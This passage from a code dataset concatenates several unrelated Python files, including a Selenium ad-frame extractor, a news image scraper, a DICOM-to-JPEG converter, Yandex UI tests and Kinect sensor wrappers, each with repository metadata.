Tuple\nfrom time import sleep\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom os import path\nimport pyautogui\nimport pandas as pd \nimport os\n\n\nclass CreativeFrameExtractor:\n '''\n Class responsible for Extracting Creative Start and End Frames.\n It requires a chrome webdriver compatible with selenium to be\n installed/included in the run environment path.\n '''\n\n def __init__(self, preview_url: str, \n save_location: str = '',\n browser_edges: Tuple[float, float] = (70, 1039)) -> None:\n \n self.preview_url = preview_url\n self.browser_edges = browser_edges\n self.save_location = save_location\n self.engagement_type = \"tap\"\n self.seconds = []\n self.opt = Options()\n self.opt.add_argument(\"--hide-scrollbars\")\n self.opt.add_experimental_option(\n \"excludeSwitches\", [\"enable-automation\"])\n # Browser Logs\n self.capabilities = DesiredCapabilities.CHROME\n self.capabilities[\"goog:loggingPrefs\"] = {\"browser\": \"ALL\"}\n\n def is_status_complete(self, passed_driver) -> bool:\n '''\n Function to check status of the AD-Unit and its completion.\n '''\n # Retrieve logs from browser\n logs = passed_driver.get_log(\"browser\")\n\n for log in logs:\n # Select logs coming from AD-Unit\n if log[\"source\"] == \"console-api\":\n # Extract message from log\n message = log[\"message\"]\n\n if '\"GAME CREATED\"' in message or '\"DROPPED\"' in message:\n # Start Recording Game\n print(\"Starting Recording AD-UNIT...\")\n print(log)\n return False\n\n if '\"START\"' in message:\n # Engaged\n print(\"AD-UNIT Engaged...\")\n print(log)\n return False\n\n if '\"GAME COMPLETE\"' in message:\n # Stop Recording Game\n print(\"Stopped Recording AD-UNIT...\")\n print(log)\n return True\n\n return True\n \n \n\n def _imitate_engagement(self, ad_size: Tuple[float, float]) -> None:\n '''\n Function to imitate a given engagement type.\n '''\n center = (ad_size[0]/2, self.browser_edges[0] + (ad_size[1]/2))\n\n if self.engagement_type == \"tap\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.leftClick()\n\n elif self.engagement_type == \"swipe right\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.dragRel(center[0], 0, duration=1)\n\n elif self.engagement_type == \"swipe left\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.dragRel(-center[0], 0, duration=1)\n\n elif self.engagement_type == \"tap and hold\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.click()\n\n elif self.engagement_type == \"scrub\":\n pyautogui.moveTo(center[0] - (1/2 * center[0]),\n center[1] - (2/3 * center[1]), duration=0.2)\n pyautogui.dragRel(center[0], 0, duration=0.2)\n pyautogui.dragRel(-center[0], (1/3 * center[1]), duration=0.2)\n pyautogui.dragRel(center[0], 0, duration=0.2)\n pyautogui.dragRel(-center[0], (1/3 * center[1]), duration=0.2)\n pyautogui.dragRel(center[0], 0, duration=0.2)\n \n\n def generate_frames(self) -> None:\n '''\n Function to generate creative start and end frames.\n '''\n # Initialize Selenium WebDriver\n driver = webdriver.Chrome(\n options=self.opt, desired_capabilities=self.capabilities, )\n # Maximize WebDriver's Window to Maximum Size\n driver.maximize_window()\n\n try:\n # Load AD-Unit through Selenium\n driver.get(self.preview_url)\n\n # Locate AD-Unit Element from Browser\n canvas = driver.find_element(By.TAG_NAME, \"canvas\")\n\n # Capture Start Frame\n canvas.screenshot(\n os.path.join(self.save_location, 'start_frame.png'))\n print('Start Frame captured')\n\n ad_size = (canvas.size.get(\"width\"), canvas.size.get(\"height\"))\n \n self._imitate_engagement(ad_size)\n t1 = datetime.now()\n\n WebDriverWait(driver, 30).until(self.is_status_complete)\n\n sleep(20)\n t2 = datetime.now()\n\n delta = t2 - t1\n canvas.screenshot(os.path.join(self.save_location,'end_frame.png'))\n print('End Frame Captured')\n sec = delta.total_seconds()\n self.seconds.append(sec)\n driver.close()\n\n except TimeoutException:\n print(\"TimeOut Exception Fired\")\n print(\"AD-Unit Status Console Logs did not Complete. Engagement Failed.\")\n self.seconds.append(0)\n driver.close()\n\n except NoSuchElementException:\n self.seconds.append(0)\n print(f\"AD-Unit Failed to Load: {self.preview_url}\")\n driver.close()\n \n def save(self, df):\n df['video_length'] = self.seconds\n df.to_csv(\"video_length.csv\")\n\nif __name__ == \"__main__\":\n path = \"../data/performance_data.csv\"\n df = pd.read_csv(path)\n game_id_col = df['game_id']\n preview_link = df['preview_link']\n parent_dir = \"../data/extracted_images\"\n for i in range(len(game_id_col)):\n print(\"Processing asset \" + game_id_col[i] + \"index \" + str(i))\n path = os.path.join(parent_dir, game_id_col[i])\n if not os.path.isdir(path):\n os.mkdir(path)\n extract = CreativeFrameExtractor(preview_link[i],path)\n extract.generate_frames()\n extract.save(df['game_id'])\n\n","repo_name":"reiten-g3-ad-challnage/computer-vision-for-creative-optimisation","sub_path":"scripts/creativeErameExtractor.py","file_name":"creativeErameExtractor.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10145169746","text":"#크롤링 하여 이미지 저장\nimport requests\nfrom SearchList import getSearchList\nimport pickle\n\nsearch_list = getSearchList(\"https://news.naver.com/\", \"ul.hdline_article_list\")\ndiv_list = search_list[0].find_all('div', class_='hdline_article_tit')\nimgList = []\nfor i, element in enumerate(div_list):\n imgTags = getSearchList(\"https://news.naver.com\" + element.find(\"a\")[\"href\"], \"div#articleBodyContents img\")\n\n images = []\n for j, img in enumerate(imgTags) :\n src = img.get(\"src\")\n response = requests.get(src[:src.index(\"?\")] )\n assert response.status_code is 200\n\n imgUrl = \"newImg\"+str(i)+str(j)+\".jpg\"\n images.append(\"./\"+imgUrl)\n with open(\"news/\"+imgUrl, \"wb\") as fp :\n fp.write(response.content)\n\n imgList.append(images)\n\nprint(imgList)\n\nwith open(\"news/imgList.txt\", \"wb\") as fp :\n pickle.dump(imgList, fp)","repo_name":"comstudy21joon/python","sub_path":"ch12_webscrap/ch12ex06.py","file_name":"ch12ex06.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26450481134","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport os #使用下面的自动读取路径下文加名,需要加上\nfrom PIL import Image\nimport numpy as np\nimport SimpleITK as STK\nimport pydicom\nimport sys #不加这个无法使用opencv\nsys.path.append('C:\\\\Users\\\\zhong\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37\\\\Lib\\\\site-packages')\nimport cv2\nimport xlwt\n\n\nRead_Path = 'E:\\\\CT coronary extraction'\nWrite_Path = 'E:\\\\ComplexDicomReadTest'\nDicom_FileName = []\nfor fpathe, dirs, fs in os.walk(Read_Path): #遍历找出路径下的所有文件,并在list中写出所有文件绝对读路径\n for f in fs:\n Each_File_Name = os.path.join(fpathe, f) #当前遍历到的这个文件的文件名\n Each_File_Handle = open(Each_File_Name, \"rb\") #以字节方式读这个文件\n Each_File_Handle.seek(128, 0) #指针偏移128\n DICOM_ORNOT = Each_File_Handle.read(4) #读取4个字节,也就是128,129,139,131这4个自己\n if DICOM_ORNOT[0] == 68 and DICOM_ORNOT[1] == 73 and DICOM_ORNOT[2] == 67 and DICOM_ORNOT[3] == 77:\n #判断这4个字节是否为大写的DICM,如果是文件为dicom文件,文件名加入dicom列表\n Dicom_FileName.append(os.path.join(fpathe, f))\n\n\nfor i in range(len(Dicom_FileName)): #对遍历出来的每个dicom文件\n Dicom_Head = pydicom.dcmread(Dicom_FileName[i]) #读取头文件信息\n #HeadInfo = [] #建立一个空的list对象存放所有dicom header info\n switch = 0 #当图像是灰度图而不是彩色,并且有overlay数据时,因为要扩充为rgb3维数据color,\n # 而且无法赋值给img_array[0/j]=color,因为整个矩阵不可能改变维度,所以用switch来标识是否\n # 直接cv2.imwrite(Image_path, color_img),是的话switch =1,否则为0,证明灰度图无overlay数据,\n #常规写入cv2.imwrite(Image_path, img_array[0/j])即可\n if \"PatientName\" in Dicom_Head: #从这里开始提取各种需要的参数,缺失的补充为NA\n PatientName = str(Dicom_Head.PatientName)\n else:\n PatientName = \"NA\"\n if \"PatientID\" in Dicom_Head:\n PatientID = str(Dicom_Head.PatientID)\n else:\n PatientID = \"NA\"\n if \"PatientBirthDate\" in Dicom_Head:\n PatientBirthDate = str(Dicom_Head.PatientBirthDate)\n else:\n PatientBirthDate = \"NA\"\n if \"PatientSex\" in Dicom_Head:\n PatientSex = str(Dicom_Head.PatientSex)\n else:\n PatientSex = \"NA\"\n if \"StudyDate\" in Dicom_Head:\n StudyDate = str(Dicom_Head.StudyDate)\n else:\n StudyDate = \"NA\"\n if \"InstitutionName\" in Dicom_Head:\n InstitutionName = str(Dicom_Head.InstitutionName)\n else:\n InstitutionName = \"NA\"\n if \"StudyID\" in Dicom_Head:\n StudyID = str(Dicom_Head.StudyID)\n else:\n StudyID = \"NA\"\n if \"StudyInstanceUID\" in Dicom_Head:\n StudyInstanceUID = str(Dicom_Head.StudyInstanceUID)\n else:\n StudyInstanceUID = PatientName + PatientID + StudyID + StudyDate #注意最终显示的病例是按StudyInstanceUID\n # 来区分的,如果这个值缺失,按照这样的补全补上,否则无法提取jpg图片\n if \"SeriesNumber\" in Dicom_Head:\n SeriesNumber = str(Dicom_Head.SeriesNumber)\n else:\n SeriesNumber = \"NA\"\n if \"SeriesInstanceUID\" in Dicom_Head:\n SeriesInstanceUID_full = str(Dicom_Head.SeriesInstanceUID)\n else:\n SeriesInstanceUID_full = \"00000\" + SeriesNumber #注意最终显示的序列是按SeriesInstanceUID\n # 来写文件夹单独显示块的,如果这个值缺失,用SeriesNumber补上,为了保证长度,加5个0\n if \"InstanceNumber\" in Dicom_Head:\n InstanceNumber = str(Dicom_Head.InstanceNumber)\n else:\n InstanceNumber = \"NA\"\n if \"RecommendedDisplayFrameRate\" in Dicom_Head:\n RecommendedDisplayFrameRate = str(Dicom_Head.RecommendedDisplayFrameRate)\n else:\n RecommendedDisplayFrameRate = \"NA\"\n if \"WindowCenter\" in Dicom_Head:\n if type(Dicom_Head.WindowCenter) == pydicom.multival.MultiValue : #比较坑人的是窗框床位居然有是数组的,比如例子CT\n #如果是这种类型,去数组的[0]就是窗框窗位值\n WindowCenter = str(Dicom_Head.WindowCenter[0])\n else:\n WindowCenter = str(Dicom_Head.WindowCenter)\n else:\n WindowCenter = \"NA\"\n if \"WindowWidth\" in Dicom_Head:\n if type(Dicom_Head.WindowWidth) == pydicom.multival.MultiValue :\n WindowWidth = str(Dicom_Head.WindowWidth[0])\n else:\n WindowWidth = str(Dicom_Head.WindowWidth)\n else:\n WindowWidth = \"NA\"\n if \"Modality\" in Dicom_Head:\n Modality = str(Dicom_Head.Modality)\n else:\n Modality = \"NA\"\n\n #用extend方法把信息一次加进来\n #HeadInfo.extend([PatientName,PatientID,PatientBirthDate,PatientSex,StudyDate,InstitutionName,StudyID,StudyInstanceUID,SeriesNumber,InstanceNumber,RecommendedDisplayFrameRate])\n Write_Path_Folder_StudyInstanceUID = Write_Path + PatientName + \"_\" + Modality + \"_\" + StudyInstanceUID #第一分类标准为StudyInstanceUID,\n # 如果写入路径下没有这个文件夹,则建立一个这个名字的文件夹,存放所有这个study的图片\n ifexist_1 = os.path.exists(Write_Path_Folder_StudyInstanceUID)\n if not ifexist_1 :\n os.makedirs(Write_Path_Folder_StudyInstanceUID)\n\n #建立了StudyInstanceUID文件夹后,把dicom header的信息写入xls文件存在该目录下,每个信息换一行\n DicomInfoFile_Path = Write_Path_Folder_StudyInstanceUID + \"\\\\\" + PatientName + \"_\" + Modality + \"_\" + StudyInstanceUID + \"_DicomInfo.xls\"\n ifexist_2 = os.path.exists(DicomInfoFile_Path)\n if not ifexist_2 :\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)\n sheet = book.add_sheet('dicom_information', cell_overwrite_ok=True)\n sheet.write(0, 0, PatientName)\n sheet.write(1, 0, PatientID)\n sheet.write(2, 0, PatientBirthDate)\n sheet.write(3, 0, PatientSex)\n sheet.write(4, 0, StudyDate)\n sheet.write(5, 0, InstitutionName)\n #sheet.write(6, 0, StudyID)\n #sheet.write(7, 0, StudyInstanceUID)\n #sheet.write(8, 0, SeriesNumber)\n #sheet.write(9, 0, InstanceNumber)\n #sheet.write(10, 0, RecommendedDisplayFrameRate)\n #sheet.write(11, 0, WindowCenter)\n #sheet.write(12, 0, WindowWidth)\n #sheet.write(13, 0, Modality)\n book.save(DicomInfoFile_Path)\n\n SeriesInstanceUID = SeriesInstanceUID_full[-6:-1] #避免文件名太长无法成功创建文件夹\n\n # 第二分类标准为SeriesNumber,如果StudyInstanceUID文件夹下没有这么一个文件夹,则建立一个,存储同一序列的jpg图片\n Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID = Write_Path_Folder_StudyInstanceUID + \"\\\\\" + SeriesInstanceUID\n ifexist_3 = os.path.exists(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID)\n if not ifexist_3 :\n os.makedirs(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID)\n\n #同时要建立一个compress文件夹,存放compress后的普通片\n Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress = Write_Path_Folder_StudyInstanceUID + \"\\\\\" + SeriesInstanceUID + \"_Compress\"\n ifexist_4 = os.path.exists(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress)\n if not ifexist_4 :\n os.makedirs(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress)\n\n #用STK读入dicom文件的图片矩阵\n\n\n img_series = STK.ReadImage(Dicom_FileName[i])\n img_array = STK.GetArrayFromImage(img_series)\n\n\n Image_Number = int(img_array.shape[0])\n #对于只有一副图的dicom文件,说明其属于多个dicom文件构成一个序列的情况,其必有InstanceNumber,则以\n #StudyInstanceUID + \"_\" + SeriesNumber + \"_\" + InstanceNumber + \".jpg\"的方式命名\n #而后在Write_Path_Folder_StudyInstanceUID_SeriesNumber和Write_Path_Folder_StudyInstanceUID_SeriesNumber_Compress\n #文件夹下分别写入高质量和压缩图片\n\n if Image_Number == 1 : #如果一个dicom文件里只有一张图,说明属于第一种情况:多幅图构成一个序列的,这些图之间\n #依靠InstanceNumber来区分先后顺序,因此图片的命名方式为:\n # StudyInstanceUID + \"_\" + SeriesNumber + \"_\" + InstanceNumber + \".jpg\"\n Image_name = StudyInstanceUID + \"_\" + SeriesInstanceUID + \"_\" + InstanceNumber + \".jpg\"\n Image_path = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID + \"\\\\\" + Image_name\n Image_path_compress = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress + \"\\\\\" + Image_name\n # 如果dicom head 含有窗宽窗位信息,用自己写的函数调节窗宽窗位--ISK的函数不靠谱啊,彩色影像如果含有窗宽窗位怎么办\n #就是下面if len(img_array[j].shape) == 3,这种应该没有窗框窗位把,不然三色怎么调节?但是如那个金色的报告呢\n #用TianKeng来转换uint16成float32(注意是双边,32才能保证对接),uint*255避免溢出的错误\n if WindowCenter != \"NA\" and WindowWidth != \"NA\":\n c = int(WindowCenter)\n w = int(WindowWidth)\n min = c - w / 2\n uint2float = np.float32(img_array[0])\n uint2float = uint2float - min\n uint2float = uint2float * (255/w)\n uint2float[uint2float < 0] = 0\n uint2float[uint2float > 255] = 255\n img_array[0] = np.uint16(uint2float)\n\n #用cv2的imwrite写入高质量图片\n #填补上opencv里面BGR2RBG的坑,但要注意,其实img_array[0]有512,512的灰度图,还有512,512,3的彩色图---还有1024的天哪哈哈哈\n if len(img_array[0].shape) == 3: #对于dicom解析出的图为彩色图的,要进行BGR2RGB的转化,不然存的时候颜色不对\n imgBGR2RGB = cv2.cvtColor(img_array[0], cv2.COLOR_BGR2RGB)\n try: #对彩色通用测试是否有overlay信息,如果有,就将overlay信息用黄色替换图片中相应的像素值\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n\n # 自定义的金色描述标注信息\n imgBGR2RGB[np.where(arr != 0)] = [120, 251, 251]\n\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n cv2.imwrite(Image_path, imgBGR2RGB)\n else:\n try: #如果dicom解析出的图示灰度图,又有overlay信息的,先要将图片转化为彩色图,再标注,否则\n #标注出的是255纯白色的,无法与图像原组织区分开(如果原组织也是白色)\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n color_img = cv2.cvtColor(img_array[0], cv2.COLOR_GRAY2BGR)\n color_img[np.where(arr != 0)] = [120, 251, 251]\n cv2.imwrite(Image_path, color_img)\n switch = 1\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n\n if switch == 0:\n cv2.imwrite(Image_path, img_array[0])\n # 用PLI的image.save写入压缩片\n Compress_Image = Image.open(Image_path)\n Compress_Image.save(Image_path_compress, optimize=True, quality=10)\n else : #一个dicom文件里有不止一幅图,说明属于第二种情况,这个dicom文件本身就是一个序列,以图片在序列里的\n #顺序给图片命名(因为这时没有instance number或者这些图instance number都是一样的),命名方式为:\n #Image_name = StudyInstanceUID + \"_\" + SeriesNumber + \"_\" + str(j) + \".jpg\"\n for j in range(Image_Number): #一个dicom含有多张图像的,就用其排布的图片顺序依次命名\n Image_name = StudyInstanceUID + \"_\" + SeriesInstanceUID + \"_\" + str(j) + \".jpg\"\n Image_path = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID + \"\\\\\" + Image_name\n Image_path_compress = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress + \"\\\\\" + Image_name\n\n if WindowCenter != \"NA\" and WindowWidth != \"NA\":\n c = int(WindowCenter)\n w = int(WindowWidth)\n min = c - w / 2\n uint2float = np.float32(img_array[j])\n uint2float = uint2float - min\n uint2float = uint2float * (255 / w)\n uint2float[uint2float < 0] = 0\n uint2float[uint2float > 255] = 255\n img_array[j] = np.uint16(uint2float)\n\n if len(img_array[j].shape) == 3:\n imgBGR2RGB = cv2.cvtColor(img_array[j], cv2.COLOR_BGR2RGB)\n try:\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n\n imgBGR2RGB[np.where(arr != 0)] = [120, 251, 251]\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n cv2.imwrite(Image_path, imgBGR2RGB)\n else:\n try:\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n color_img = cv2.cvtColor(img_array[j], cv2.COLOR_GRAY2BGR)\n color_img[np.where(arr != 0)] = [120, 251, 251]\n cv2.imwrite(Image_path, color_img)\n switch = 1\n\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n if switch == 0:\n cv2.imwrite(Image_path, img_array[j])\n # 用PLI的image.save写入压缩片\n Compress_Image = Image.open(Image_path)\n Compress_Image.save(Image_path_compress, optimize=True, quality=10)\n","repo_name":"billlaw6/python_utils","sub_path":"dicom_parse_v4_szw.py","file_name":"dicom_parse_v4_szw.py","file_ext":"py","file_size_in_byte":18768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12210955312","text":"from pages.images_page import ImagesPage\nfrom pages.locators import ImagesPageLocators\nfrom pages.main_page import MainPage\n\n\nclass TestCaseImagesInYandex:\n def test_should_be_images_link(self, browser):\n \"\"\"Проверка наличия ссылки «Картинки»\"\"\"\n page = MainPage(browser)\n page.open()\n page.should_be_images_link()\n\n def test_is_images_page(self, browser):\n \"\"\"Проверка перехода на страницу «Картинки»\"\"\"\n page = MainPage(browser)\n page.open()\n page.go_to_images_page()\n page.is_current_link(ImagesPageLocators.IMAGES_LINK)\n\n def test_open_first_category_check_text(self, browser):\n \"\"\"Проверка открытия категорий и соответствия текста в поиске\"\"\"\n page = MainPage(browser)\n page.open()\n page.go_to_images_page()\n images_page = ImagesPage(browser)\n images_page.open_category()\n images_page.check_text()\n\n def test_open_image(self, browser):\n \"\"\"Проверка открытия изображения\"\"\"\n page = ImagesPage(browser, ImagesPageLocators.IMAGES_LINK)\n page.open()\n page.open_category()\n page.click_firs_image()\n page.image_should_be_change()\n\n\n\n\n","repo_name":"bashkoigor/yandex_auto_tests","sub_path":"tests/test_images_page.py","file_name":"test_images_page.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30604354864","text":"import pandas as pd\nimport numpy as np\n\ndf = pd.read_csv(\"TablasEs/StatResumen.csv\")\nmeses = ['enero','febrero','marzo','abril','mayo','junio','julio','agosto','septiembre','octubre','noviembre','diciembre']\n#******************************************************************\n#\t\t\t\tEliminando las horas de la Fecha\n#******************************************************************\na = df['Fecha'].to_list()\nlista = a[0][0:11]\nfor i, lista in enumerate(a):\n lista = lista[0:11]\n a[i] = lista\nprint(a)\ndf['Fecha'] = a\ndel df['Unnamed: 0']\nprint(df)\nprint(df.columns)\nwith pd.ExcelWriter(\"StatResumen.xlsx\") as writer:\n df.to_excel(writer, sheet_name='Sheet1')\ndf[\"Fecha\"] = pd.to_datetime(df[\"Fecha\"])\n#******************************************************************\n#\t\t\t\tConvertir Meses a literal\n#******************************************************************\nfor i,m in enumerate(meses):\n mask = df.Fecha.dt.month == i+1\n print(i+1)\n print(m)\n #print(mask)\n mask.replace(True, np.nan, inplace = True)\n print(mask)\n\nprint(df)","repo_name":"Lionhardv2/Test","sub_path":"PresTab.py","file_name":"PresTab.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18268719641","text":"from pykinect import nui\nfrom openni import openni2, nite2, utils\nfrom openni import _openni2 as c_api\nimport numpy as np\nimport cv2\nimport _thread\nfrom .abstract import Sensor\nfrom global_configs import *\n\n\n__all__ = ['KinectMS1', 'KinectNI']\n\nnp.set_printoptions(suppress=True)\n\n\nclass KinectMS1(Sensor):\n \"\"\"Kinect CDT with Microsoft backends.\"\"\"\n def __init__(self):\n super(KinectMS1, self).__init__()\n self._screen_lock = _thread.allocate()\n self.joints_per_person = SensorJointNumber.KINECT_V1\n\n def initialize_device(self):\n self._device = nui.Runtime()\n self._motor = self._device\n self._user_tracker = self._device.skeleton_engine\n self._user_tracker.enabled = True\n self._color_stream = self._device.video_stream\n self._depth_stream = self._device.depth_stream\n self.set_color_stream()\n self.set_depth_stream()\n self.handle_color_frame()\n self.handle_depth_frame()\n self.handle_skeleton_frame()\n self.is_opened = True\n\n def set_color_stream(self):\n self._color_stream.open(nui.ImageStreamType.Video, 2,\n nui.ImageResolution.Resolution640x480,\n nui.ImageType.Color)\n\n def set_depth_stream(self):\n self._depth_stream.open(nui.ImageStreamType.Depth, 2,\n nui.ImageResolution.Resolution320x240,\n nui.ImageType.Depth)\n\n def handle_color_frame(self):\n self._device.video_frame_ready += self.update_color_frame\n\n def handle_depth_frame(self):\n self._device.depth_frame_ready += self.update_depth_frame\n\n def handle_skeleton_frame(self):\n self._device.skeleton_frame_ready += self.update_skeletons\n\n def update_color_frame(self, raw_frame):\n color_frame = np.empty((FRAME_HEIGHT, FRAME_WIDTH, 4), np.uint8)\n raw_frame.image.copy_bits(color_frame.ctypes.data)\n color_frame = cv2.resize(color_frame, dsize=(FRAME_WIDTH, FRAME_HEIGHT))\n self._color_frame = cv2.cvtColor(color_frame, cv2.COLOR_BGRA2RGB)\n\n def update_depth_frame(self, raw_frame):\n depth_frame_holder = np.empty((FRAME_HEIGHT // 2, FRAME_WIDTH // 2, 1), np.uint8)\n depth_frame = (depth_frame_holder >> 3) & 4095\n depth_frame >>= 4\n raw_frame.image.copy_bits(depth_frame.ctypes.data)\n depth_frame = cv2.resize(depth_frame.squeeze(), dsize=(FRAME_WIDTH, FRAME_HEIGHT)) / 256\n self._depth_frame = depth_frame.astype(np.uint8)\n\n def update_skeletons(self, frame):\n skeletons = []\n for skeleton in frame.SkeletonData:\n if skeleton.eTrackingState == nui.SkeletonTrackingState.TRACKED:\n self.skeleton_available = True\n skeletons.append(skeleton)\n num_skeletons = len(skeletons)\n if not num_skeletons:\n self.skeleton_available = False\n return\n self._skeleton = skeletons[0]\n if num_skeletons > 1:\n self._skeleton2 = skeletons[1]\n\n def read_color_frame(self):\n return True, self._color_frame\n\n def read_depth_frame(self):\n return True, self._depth_frame\n\n def tilt_up(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle + 2 if current_angle < MAXIMUM_ELEVATION \\\n else current_angle\n\n def tilt_down(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle - 2 if current_angle > MINIMUM_ELEVATION \\\n else current_angle\n\n def get_tilt_angle(self):\n return self._motor.camera.get_elevation_angle()\n\n def get_skeleton1(self) -> np.ndarray:\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n if self._skeleton is not None:\n for idx, joint in enumerate(self._skeleton.SkeletonPositions):\n x = joint.x * 1000\n y = joint.y * 1000\n z = joint.z * 1000\n w = joint.w\n ret[idx] = (x, y, z, w)\n return ret\n\n def get_skeleton2(self) -> np.ndarray:\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n if self._skeleton2 is not None:\n for idx, joint in enumerate(self._skeleton2.SkeletonPositions):\n x = joint.x * 1000\n y = joint.y * 1000\n z = joint.z * 1000\n w = joint.w\n ret[idx] = (x, y, z, w)\n return ret\n\n def close(self):\n if self._device is not None:\n self._device = None\n self.is_opened = False\n\n\n# deprecated\nclass KinectNI(Sensor):\n \"\"\"Kinect CDT with PrimeSense backends. Motor uses Microsoft backend.\"\"\"\n def __init__(self):\n super(KinectNI, self).__init__()\n self._screen_lock = _thread.allocate()\n self.confidence_thres = DEFAULT_CONFIDENCE_THRES\n self.joints_per_person = SensorJointNumber.OPENNI\n\n def initialize_device(self):\n openni2.initialize()\n nite2.initialize()\n self._device = openni2.Device.open_any()\n self._motor = nui.Runtime()\n self.set_depth_stream()\n self.set_color_stream()\n self._user_tracker = nite2.UserTracker(self._device)\n self.is_opened = True\n\n def set_depth_stream(self):\n self._depth_stream = self._device.create_depth_stream()\n self._depth_stream.set_video_mode(\n c_api.OniVideoMode(pixelFormat=c_api.OniPixelFormat.ONI_PIXEL_FORMAT_DEPTH_1_MM,\n resolutionX=FRAME_WIDTH, resolutionY=FRAME_HEIGHT, fps=FRAME_RATE))\n self._depth_stream.start()\n\n def set_color_stream(self):\n self._color_stream = self._device.create_color_stream()\n self._color_stream.set_video_mode(\n 